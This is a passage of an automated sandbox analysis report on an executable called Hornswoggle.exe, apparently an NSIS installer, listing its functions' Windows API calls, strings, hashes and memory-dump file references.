Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
ShowWindow.USER32(00000000,00000005), ref: 00402CAD

Part of subcall function 00402BFB: MulDiv.KERNEL32(000B566A,00000064,000B8A01), ref: 00402C10

Strings

... %d%%, xrefs: 00402C75

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
Instruction ID: 50736a5f322e453d47399e53c3729a9749aec8e4ed59b6a4d84230157c1bc9e9
Opcode Fuzzy Hash: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
Instruction Fuzzy Hash: 400161B090A624EBEB21AF64EF0DD9F7768EB04701B444177F405B11E4D6B89942C69E

Function 00404947 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
GetMessagePos.USER32 ref: 0040496A
ScreenToClient.USER32(?,?), ref: 00404984
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC

Strings

f, xrefs: 00404998

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 9a5aaf7a7a2eb46524cfe6ed05727662581176125bc7a9594c14671d6fd5834d
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: D60152B1D00219BADB11DBA4DC45FFFBBBCAF55711F10416BBA10B61C0C7B869018BA5

Function 00402B7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
wsprintfA.USER32 ref: 00402BCE
SetWindowTextA.USER32(?,?), ref: 00402BDE
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0

Strings

unpacking data: %d%%, xrefs: 00402BBC, 00402BCC
verifying installer: %d%%, xrefs: 00402BC3

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction ID: 59ddb31903a36680b4224ad2704aa62d89b79b457576c75755388437ec856a92
Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction Fuzzy Hash: D5F01D70900208AAEF205F60DD0ABAE3779FB04345F00803AFA16B51D0D7B9AA559B59

Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
GlobalFree.KERNEL32(?), ref: 0040276F
GlobalFree.KERNEL32(00000000), ref: 00402782
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
Instruction ID: 485419aab899adaa45f09767fc84dfb68f9751acdadaf5e244b928a283e6c860
Opcode Fuzzy Hash: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
Instruction Fuzzy Hash: 0A21AE71800128BBCF116FA5CE89DAE7A79EF08364F10423AF921762D0C7795D018F98

Function 0040483D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Festremser Setup: Completed,Festremser Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
wsprintfA.USER32 ref: 004048E3
SetDlgItemTextA.USER32(?,Festremser Setup: Completed), ref: 004048F6

Strings

%u.%u%s%s, xrefs: 004048C5
Festremser Setup: Completed, xrefs: 004048CD, 004048D2, 004048D8, 004048EC

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Festremser Setup: Completed
API String ID: 3540041739-2766138748
Opcode ID: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
Opcode Fuzzy Hash: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8

Function 00403AA8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00422F20), ref: 00403B40

Strings

1033, xrefs: 00403AAC, 00403AB6, 00403B27
Festremser Setup: Completed, xrefs: 00403AAB
=CQ, xrefs: 00403B1D
"C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 00403AA9

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$1033$=CQ$Festremser Setup: Completed
API String ID: 530164218-3010983197
Opcode ID: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
Instruction ID: 4ecc7a7cce5d2b157b8937249730f08b858357f8198c33761da0ca3de106299a
Opcode Fuzzy Hash: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
Instruction Fuzzy Hash: CE11C971B006119BC7309F55DC909737B7CEB8571A364817FD90167391D73DAD029A58

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
Opcode Fuzzy Hash: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79

Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
Opcode Fuzzy Hash: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F

Function 004058D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058DB
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058E4
lstrcatA.KERNEL32(?,00409014), ref: 004058F5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004058D5

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 3de60a59262c475c5440d19c682801eda6224deee4fb27ea49e877a9fa99e37c
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: A6D0A972605A303AD20233198C05E8B3A08CF26351B040032F641B22A2CA7C0E418BFE

Function 0040596E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,75923410,?,75922EE0,00405725,?,75923410,75922EE0,00000000), ref: 0040597C
CharNextA.USER32(00000000), ref: 00405981
CharNextA.USER32(00000000), ref: 00405995

Strings

C:\, xrefs: 0040596F

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
Instruction ID: 93fa8612b98c37d3538e1dab61372dab2b439c5e428625c22ffade58a408e5cb
Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
Instruction Fuzzy Hash: D0F096D1909F60ABFB3292684C54B775B8DCB55771F18547BE540B62C2C27C48408FAA

Function 00404FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040501F
CallWindowProcA.USER32(?,?,?,?), ref: 00405070

Part of subcall function 00404094: SendMessageA.USER32(0001043C,00000000,00000000,00000000), ref: 004040A6

Strings

, xrefs: 00405000

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA

Function 0040591C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405922
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405930

Strings

C:\Users\user\Desktop, xrefs: 0040591C

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 8de3941b568bd0f8b26bcb964e879cd368c776abfab0e8ce3c3ebd0dc0734e68
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: 1CD0C7B2409D70AEE3036314DC04F9F6A48DF27715F094462E181E61A1C6BC5D814BED

Function 00405A3B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
